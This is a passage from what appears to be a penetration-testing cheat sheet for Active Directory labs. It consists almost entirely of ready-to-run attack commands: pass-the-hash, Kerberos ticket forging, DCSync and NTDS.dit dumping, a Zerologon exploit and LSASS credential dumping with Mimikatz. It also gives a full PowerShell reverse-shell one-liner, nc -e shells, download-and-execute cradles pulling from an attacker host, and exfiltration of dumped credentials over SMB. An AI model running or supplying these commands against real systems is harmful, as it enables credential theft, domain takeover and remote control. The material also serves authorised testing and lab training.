rights Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=htb" -PrincipalIdentity compromised_user -Rights DCSync # ForceChangePassword Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force) # Impacket tools for ACL abuse impacket-owneredit -action write -new-owner compromised_user -target target_object domain.htb/compromised_user:pass -dc-ip $DC impacket-dacledit -action write -rights FullControl -principal compromised_user -target target_object domain.htb/compromised_user:pass -dc-ip $DC

# CrackMapExec crackmapexec smb $IP -u administrator -H 'NTLM_HASH' crackmapexec smb $IP/24 -u administrator -H 'NTLM_HASH' --continue-on-success # spray subnet crackmapexec smb $IP -u administrator -H 'NTLM_HASH' -x "whoami" crackmapexec winrm $IP -u administrator -H 'NTLM_HASH' # Evil-WinRM evil-winrm -i $IP -u administrator -H 'NTLM_HASH' # Impacket tools impacket-psexec -hashes :NTLM_HASH administrator@$IP impacket-smbexec -hashes :NTLM_HASH administrator@$IP impacket-wmiexec -hashes :NTLM_HASH administrator@$IP impacket-atexec -hashes :NTLM_HASH administrator@$IP cmd.exe "whoami" # xfreerdp PtH xfreerdp /v:$IP /u:administrator /pth:NTLM_HASH /d:domain.htb /cert:ignore

# Get a TGT or TGS .\Rubeus.exe tgtdeleg /nowrap # use current TGT .\Rubeus.exe asktgt /user:user /rc4:HASH /domain:domain.htb /ptt .\Rubeus.exe asktgs /service:cifs/target /ticket:BASE64 /ptt # Import ticket with Mimikatz .\mimikatz.exe kerberos::ptt ticket.kirbi # Impacket — use ticket export KRB5CCNAME=/path/to/ticket.ccache impacket-psexec -k -no-pass domain.htb/user@target.domain.htb impacket-smbclient -k -no-pass domain.htb/user@target.domain.htb # Convert ticket formats (kirbi ↔ ccache) impacket-ticketConverter ticket.kirbi ticket.ccache impacket-ticketConverter ticket.ccache ticket.kirbi

# Overpass-the-hash: use NTLM hash to get Kerberos ticket .\Rubeus.exe asktgt /user:user /rc4:NTLM_HASH /domain:domain.htb /ptt .\Rubeus.exe asktgt /user:user /aes256:AES256_KEY /domain:domain.htb /ptt /opsec # Mimikatz .\mimikatz.exe sekurlsa::pth /user:user /domain:domain.htb /ntlm:NTLM_HASH /run:cmd.exe # Impacket — get TGT impacket-getTGT domain.htb/user -hashes :NTLM_HASH -dc-ip $DC impacket-getTGT domain.htb/user -aesKey AES256_KEY -dc-ip $DC export KRB5CCNAME=user.ccache

# Requirements: krbtgt hash, domain SID # Get krbtgt hash (after DCSync or DC compromise) impacket-secretsdump domain.htb/administrator:pass@$DC # or: .\mimikatz.exe "lsadump::dcsync /domain:domain.htb /user:krbtgt" exit # Get domain SID impacket-lookupsid domain.htb/user:pass@$DC | grep "Domain SID" # or: wmic useraccount get name,sid (from Windows) # Forge Golden Ticket with Impacket impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.htb administrator # Use the ticket export KRB5CCNAME=administrator.ccache impacket-psexec -k -no-pass domain.htb/administrator@$DC # Forge with Mimikatz (from Windows) .\mimikatz.exe kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:KRBTGT_HASH /user:administrator /ticket:golden.kirbi kerberos::ptt golden.kirbi

# Requirements: target service account hash, domain SID, SPN # Forge Silver Ticket (CIFS service) impacket-ticketer -nthash SERVICE_NTLM_HASH -domain-sid S-1-5-21-XXXXXXXXXX -domain domain.htb -spn cifs/target.domain.htb administrator # Common SPNs for silver tickets # cifs/target.domain.htb → file access (SMB) # http/target.domain.htb → web access # mssql/target.domain.htb → SQL Server access # host/target.domain.htb → WMI, remote access # Use export KRB5CCNAME=administrator.ccache impacket-smbclient -k -no-pass domain.htb/administrator@target.domain.htb # Mimikatz silver ticket .\mimikatz.exe kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:SERVICE_HASH /user:administrator /service:cifs /target:target.domain.htb /ticket:silver.kirbi kerberos::ptt silver.kirbi

# Impacket psexec (creates service, gets SYSTEM) impacket-psexec administrator:password@$IP impacket-psexec -hashes :NTLM_HASH administrator@$IP impacket-psexec -k -no-pass domain.htb/administrator@$IP # Kerberos # smbexec (uses service, no upload) impacket-smbexec administrator:password@$IP impacket-smbexec -hashes :NTLM_HASH administrator@$IP # wmiexec (WMI — less noisy) impacket-wmiexec administrator:password@$IP impacket-wmiexec -hashes :NTLM_HASH administrator@$IP impacket-wmiexec -k -no-pass domain.htb/administrator@$IP # atexec (scheduled task execution) impacket-atexec administrator:password@$IP "whoami" impacket-atexec -hashes :NTLM_HASH administrator@$IP "cmd /c whoami > C:\Temp\out.txt" # CrackMapExec execution crackmapexec smb $IP -u admin -p pass -x "whoami" # cmd crackmapexec smb $IP -u admin -p pass -X "whoami" # PowerShell crackmapexec smb $IP -u admin -p pass --exec-method smbexec -x "whoami"

:: Windows PsExec PsExec.exe \\target -u administrator -p password cmd.exe PsExec.exe \\target -u domain\admin -p password -s cmd.exe :: as SYSTEM :: Pass credentials net use \\target\ipc$ "password" /u:domain\user PsExec.exe \\target cmd.exe

# From Windows — WMI exec Invoke-WmiMethod -ComputerName target -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt" $cred = Get-Credential Invoke-WmiMethod -ComputerName target -Credential $cred -Class Win32_Process -Name Create -ArgumentList "C:\Temp\shell.exe" # wmic wmic /node:$IP /user:domain\admin /password:pass process call create "cmd /c whoami > C:\Temp\out.txt"

:: Mimikatz sekurlsa::pth — spawn process with different creds .\mimikatz.exe sekurlsa::pth /user:administrator /domain:domain.htb /ntlm:NTLM_HASH /run:"cmd.exe" :: New cmd window opens — connected as administrator via PtH

# Requires: Domain Admin, DA-equivalent, or DCSync rights (GetChangesAll + GetChanges) # Impacket secretsdump — remote DCSync impacket-secretsdump domain.htb/administrator:pass@$DC impacket-secretsdump -hashes :NTLM_HASH domain.htb/administrator@$DC impacket-secretsdump -just-dc domain.htb/administrator:pass@$DC # only DC impacket-secretsdump -just-dc-user krbtgt domain.htb/administrator:pass@$DC # krbtgt only # Mimikatz DCSync (from Windows with DA) .\mimikatz.exe lsadump::dcsync /domain:domain.htb /all /csv lsadump::dcsync /domain:domain.htb /user:administrator lsadump::dcsync /domain:domain.htb /user:krbtgt # CrackMapExec DCSync crackmapexec smb $DC -u administrator -p pass --ntds crackmapexec smb $DC -u administrator -H NTLM_HASH --ntds crackmapexec smb $DC -u administrator -p pass --ntds --users

# Shadow copy method (from Windows) vssadmin create shadow /for=C: cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\NTDS.dit cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM # Or with CrackMapExec / ntdsutil crackmapexec smb $DC -u admin -p pass --ntds vss # via VSS # Dump with ntdsutil ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\IFM" quit quit # Copy C:\Temp\IFM\Active Directory\ntds.dit and SYSTEM hive # Parse NTDS.dit on Kali impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL -outputfile hashes.txt

# Check vulnerability python3 zerologon_tester.py NETBIOS_NAME $DC # Exploit (sets DC computer account password to empty) python3 cve-2020-1472-exploit.py NETBIOS_NAME $DC # DCSync with empty password impacket-secretsdump -just-dc -no-pass domain.htb/NETBIOS_NAME\$@$DC # IMPORTANT: Restore DC password after exploitation! impacket-reinstall_original_pw NETBIOS_NAME $DC hex_original_password

# Task Manager GUI (if RDP access) # Right-click lsass.exe → Create Dump File # ProcDump (Sysinternals — less AV detection) .\procdump.exe -ma lsass.exe C:\Temp\lsass.dmp .\procdump.exe -ma -r lsass.exe C:\Temp\lsass.dmp # reflective (AV bypass) # Comsvcs.dll method C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID C:\Temp\lsass.dmp full # From PowerShell $process = Get-Process lsass [System.Runtime.InteropServices.Marshal]::WriteInt32([System.Runtime.InteropServices.Marshal]::AllocHGlobal(4), $process.Id) # Better to use tool-based approaches # Mimikatz direct LSASS (needs debug privilege) .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit .\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" exit # cleartext .\mimikatz.exe "privilege::debug" "sekurlsa::tickets" exit # Kerberos # Parse dump offline on Kali with pypykatz pip3 install pypykatz pypykatz lsa minidump lsass.dmp pypykatz lsa minidump lsass.dmp | tee parsed_lsass.txt

:: Export registry hives reg save HKLM\SAM C:\Temp\SAM reg save HKLM\SYSTEM C:\Temp\SYSTEM reg save HKLM\SECURITY C:\Temp\SECURITY :: Parse on Kali impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL :: With CrackMapExec crackmapexec smb $IP -u admin -p pass --sam crackmapexec smb $IP -u admin -p pass --lsa # LSA secrets

:: Privilege privilege::debug :: LSASS / logon passwords sekurlsa::logonpasswords sekurlsa::wdigest sekurlsa::kerberos sekurlsa::tspkg sekurlsa::msv sekurlsa::livessp sekurlsa::ssp :: Kerberos tickets sekurlsa::tickets sekurlsa::tickets /export kerberos::list kerberos::list /export kerberos::purge kerberos::ptt ticket.kirbi :: Golden / Silver kerberos::golden /domain:domain.htb /sid:S-1-5-21-... /rc4:KRBTGT_HASH /user:administrator /ticket:golden.kirbi kerberos::silver /domain:domain.htb /sid:S-1-5-21-... /rc4:SERVICE_HASH /user:administrator /service:cifs /target:host.domain.htb /ticket:silver.kirbi :: SAM / LSA lsadump::sam lsadump::lsa /patch lsadump::secrets lsadump::cache :: DCSync lsadump::dcsync /domain:domain.htb /user:krbtgt lsadump::dcsync /domain:domain.htb /all /csv :: DPAPI sekurlsa::dpapi # masterkeys dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect dpapi::cred /in:"credential_file" :: Token manipulation token::list token::elevate token::elevate /domainadmin token::revert

# Identify hash type hash-identifier <hash> hashid <hash> # Hashcat modes hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt # NTLM hashcat -m 3000 lm.txt /usr/share/wordlists/rockyou.txt # LM hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt # NTLMv2 hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # Kerberoast (TGS-REP) hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt # AS-REP hashcat -m 1800 sha512crypt.txt /usr/share/wordlists/rockyou.txt # sha512crypt hashcat -m 500 md5crypt.txt /usr/share/wordlists/rockyou.txt # md5crypt # Rules hashcat -m 1000 ntlm.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule hashcat -m 1000 ntlm.txt rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule # John john ntlm.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt john asrep.txt --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt john --show ntlm.txt

:: User flag type C:\Users\user\Desktop\user.txt dir /s /b user.txt 2>nul :: Root / Admin flag type C:\Users\Administrator\Desktop\root.txt type C:\Administrator\Desktop\root.txt dir /s /b root.txt 2>nul

# Python HTTP server python3 -m http.server 80 # PowerShell download powershell -c "(New-Object Net.WebClient).DownloadFile('http://$LHOST/file.exe','C:\Temp\file.exe')" powershell -c "IWR http://$LHOST/file.exe -OutFile C:\Temp\file.exe" powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/script.ps1')" # Certutil certutil.exe -urlcache -split -f http://$LHOST/file.exe C:\Temp\file.exe certutil.exe -decode encoded.b64 file.exe # Bitsadmin bitsadmin /transfer job /download /priority high http://$LHOST/file.exe C:\Temp\file.exe # SMB server impacket-smbserver share . -smb2support # On Windows: copy \\$LHOST\share\file.exe C:\Temp\file.exe net use Z: \\$LHOST\share

# SMB upload impacket-smbserver share . -smb2support -username user -password pass # On Windows: net use Z: \\$LHOST\share /user:user pass copy file.txt Z:\

:: PowerShell upload via POST Invoke-WebRequest -Uri "http://$LHOST/upload" -Method POST -Body (Get-Content -Raw -Path C:\file.txt) :: Certutil base64 encode certutil.exe -encode C:\file.exe encoded.b64 :: Copy base64 text, decode on Kali: base64 -d encoded.b64 > file.exe :: SMB (from Windows after net use) copy C:\Temp\lsass.dmp Z:\

# PowerShell reverse shell (one-liner) powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # ConPtyShell (fully interactive PowerShell — best option) # On Kali: stty raw -echo; (stty size; cat) | nc -lvnp $LPORT # On Windows: IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Invoke-ConPtyShell.ps1') Invoke-ConPtyShell $LHOST $LPORT # Nishang reverse shell IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Invoke-PowerShellTcp.ps1') Invoke-PowerShellTcp -Reverse -IPAddress $LHOST -Port $LPORT # CMD reverse shell via nc .\nc.exe $LHOST $LPORT -e cmd.exe # MSFVenom (see Phase 5) msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell.exe

# Netcat nc -lvnp $LPORT rlwrap nc -lvnp $LPORT # better arrow keys # Metasploit multi/handler msfconsole -q use exploit/multi/handler set PAYLOAD windows/x64/shell_reverse_tcp set LHOST $LHOST set LPORT $LPORT set ExitOnSession false run -j # Socat (fully interactive) socat file:`tty`,raw,echo=0 TCP-LISTEN:$LPORT # On Windows: .\socat.exe TCP:$LHOST:$LPORT EXEC:cmd.exe,pty,stderr,setsid,sigint,sane

# Passwords /usr/share/wordlists/rockyou.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt # Usernames /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt /usr/share/seclists/Usernames/Names/names.txt # Web /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt # DNS /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

# References GTFOBins (Windows): https://lolbas-project.github.io LOLBAS: https://lolbas-project.github.io HackTricks AD: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings BloodHound: https://github.com/BloodHoundAD/BloodHound Impacket: https://github.com/SecureAuthCorp/impacket # Tool Download Locations WinPEAS: https://github.com/carlospolop/PEASS-ng/releases Rubeus: https://github.com/GhostPack/Rubeus SharpHound: https://github.com/BloodHoundAD/SharpHound Mimikatz: https://github.com/gentilkiwi/mimikatz PowerView: https://github.com/PowerShellMafia/PowerSploit PowerUp: https://github.com/PowerShellMafia/PowerSploit Seatbelt: https://github.com/GhostPack/Seatbelt GodPotato: https://github.com/BeichenDream/GodPotato PrintSpoofer: https://github.com/itm4n/PrintSpoofer Certify: https://github.com/GhostPack/Certify Certipy: https://github.com/ly4k/Certipy (ADCS attacks from Kali)